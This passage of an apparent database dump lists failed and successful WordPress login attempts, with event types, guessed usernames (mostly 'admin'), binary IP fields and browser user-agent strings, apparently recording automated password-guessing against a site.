Safari/537.36'),(646,2115,1694320934.033169,1,'loginFailInvalidUsername','ccc1',0,' O5JIdS','Mozilla/5.0 (Linux; Android 12; SM-F926U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(647,2117,1694321773.335992,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(648,2132,1694328356.773148,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(649,2144,1694333211.232742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0F=','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(650,2154,1694340356.832799,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(651,2158,1694343124.968789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0F=','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(652,2165,1694345829.261115,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(653,2168,1694347295.650366,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0. ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(654,2175,1694350034.731583,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0F^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(655,2178,1694352353.922968,1,'loginFailInvalidUsername','cristian',0,'\0\0\0\0\0\0\0\0\0\0{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(656,2179,1694352354.688927,1,'loginFailInvalidUsername','cristian',0,'\0\0\0\0\0\0\0\0\0\0{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(657,2180,1694352355.525608,1,'loginFailInvalidUsername','cristian',0,'\0\0\0\0\0\0\0\0\0\0{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(658,2181,1694352356.316700,1,'loginFailInvalidUsername','cristian',0,'\0\0\0\0\0\0\0\0\0\0{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(659,2182,1694352357.102363,1,'loginFailInvalidUsername','cristian',0,'\0\0\0\0\0\0\0\0\0\0{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(660,2183,1694352358.912043,1,'loginFailInvalidUsername','cristian',0,'\0\0\0\0\0\0\0\0\0\0{','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(661,2184,1694352473.493057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(662,2194,1694358036.299471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(663,2199,1694363820.316240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(664,2201,1694365488.841838,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(665,2216,1694377324.759914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(666,2223,1694381879.452563,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(667,2239,1694397169.838024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(668,2249,1694403018.446310,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0grb','Mozilla/5.0 (Linux; Android 11; SM-G988U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(669,2250,1694403021.653709,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0g-','Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(670,2251,1694403024.557844,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0qp','Mozilla/5.0 (Linux; Android 12; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(671,2252,1694403027.544000,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0pj','Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(672,2253,1694403032.558461,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0ʲ|','Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G781U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(673,2254,1694403035.969896,1,'loginFailInvalidUsername','zero',0,'$ (0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 12; SM-G970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.61 Mobile Safari/537.36'),(674,2258,1694404056.729710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(675,2259,1694404671.323930,1,'loginFailValidUsername','admin',1,'$\0e\0%','Mozilla/5.0 (Linux; Android 11; Nokia 2.4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(676,2260,1694404682.051375,1,'loginFailInvalidUsername','armani',0,'$\0aFo]ЦN','Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(677,2261,1694404685.835295,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0No','Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(678,2262,1694404688.986434,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0}','Mozilla/5.0 (Linux; Android 11; EC211002) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(679,2263,1694404695.789866,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0 SeaMonkey/2.53.10.2'),(680,2264,1694404699.523029,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0n','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(681,2265,1694404704.536735,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0eX','Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(682,2268,1694406007.203685,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(683,2271,1694406387.359386,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0gx&','Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36 OPR/66.2.3445.62346'),(684,2272,1694406391.075361,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Linux; Android 11; SM-G973U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(685,2273,1694406394.369347,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0O','Mozilla/5.0 (Linux; Android 11; REVVL V+ 5G Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.87 Mobile Safari/537.36'),(686,2274,1694406398.090787,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0\'>b','Mozilla/5.0 (Linux; Android 11; SM-F916U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(687,2275,1694406400.845549,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0\rz','Mozilla/5.0 (Linux; Android 9; KFTRWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/96.1.237 like Chrome/96.0.4664.128 Safari/537.36'),(688,2276,1694406405.340047,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0{e&','Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1'),(689,2317,1694418806.148519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(690,2318,1694418808.068703,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'),(691,2322,1694418821.905810,1,'loginFailValidUsername','admin',1,'*x\0\0\0\0\0\0\0h\0)','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(692,2326,1694418832.563922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0kp','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(693,2331,1694419698.293584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(694,2332,1694419708.573087,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(695,2333,1694419713.987249,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(696,2334,1694419714.971918,1,'loginFailValidUsername','admin',1,'*G\0EU\0\0\0\0\0\0\0','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),(697,2335,1694419721.478312,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(698,2337,1694419728.347402,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'),(699,2348,1694420902.706166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(700,2352,1694421763.789761,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(701,2356,1694422927.648378,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(702,2377,1694427125.593261,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(703,2385,1694430152.785839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0be','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(704,2388,1694430681.776629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0DB','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),(705,2389,1694430684.257309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'),(706,2389,1694430684.269294,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'),(707,2390,1694430684.422228,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QFZx','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(708,2391,1694430687.732221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gx','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(709,2394,1694430704.054692,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'),(710,2398,1694430713.324146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(711,2405,1694431408.519994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0YC','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(712,2422,1694436287.578783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z|<','Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(713,2423,1694436297.880005,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0'),(714,2425,1694436307.727884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0__x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(715,2429,1694437225.270938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0#(','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(716,2431,1694437225.646577,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build/RB3N5C; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36'),(717,2432,1694437231.615819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ν','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(718,2434,1694437233.400723,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(719,2435,1694437236.197597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(720,2436,1694437245.959705,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QG','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'),(721,2437,1694437251.560314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(722,2438,1694437253.495056,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'),(723,2439,1694437255.360081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(724,2440,1694437260.081164,1,'loginFailValidUsername','admin',1,'*Ȫ\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(725,2441,1694437264.291374,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0橊','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(726,2450,1694439158.398861,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0be','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(727,2453,1694439461.220540,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0be','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(728,2455,1694440097.019424,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(729,2466,1694442035.164890,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(730,2467,1694442035.410371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0e4','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(731,2468,1694442040.341872,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(732,2470,1694442051.320754,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0&N','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(733,2471,1694442051.868616,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0kp','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(734,2472,1694442060.234403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(735,2473,1694442061.929233,1,'loginFailValidUsername','admin',1,'*G\0EU\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0'),(736,2476,1694442073.948891,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'),(737,2483,1694443630.994198,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(738,2503,1694445146.557221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(739,2504,1694445458.338708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(740,2506,1694445815.429547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(741,2514,1694447832.386604,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(742,2515,1694447833.269406,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0P','Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),(743,2518,1694447840.735909,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(744,2519,1694447841.872923,1,'loginFailValidUsername','admin',1,'* r\0\0\0\0\"','Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(745,2520,1694447846.773751,1,'loginFailValidUsername','admin',1,'*\0*\0a\0=','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(746,2521,1694447851.000135,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z$','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0'),(747,2522,1694447852.471356,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(748,2524,1694447862.304825,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(749,2527,1694447872.057854,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(750,2529,1694447881.340365,1,'loginFailValidUsername','admin',1,'*x\0\0\0\0\0\0\0h\0)','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(751,2546,1694453526.933994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),(752,2547,1694453533.387940,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(753,2548,1694453534.968122,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gJf','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(754,2549,1694453541.527451,1,'loginFailValidUsername','admin',1,'&\0\0_h25','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),(755,2558,1694453592.901146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0__x','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(756,2571,1694457573.305613,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘U','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(757,2598,1694460799.276488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(758,2599,1694460801.133063,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(759,2606,1694460814.780471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QG','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(760,2607,1694460825.808152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),(761,2609,1694460881.688735,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D+','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(762,2609,1694460881.695756,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D+','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(763,2619,1694464489.153476,1,'loginFailInvalidUsername','Mini Gut Guru',0,'\0\0\0\0\0\0\0\0\0\0(S 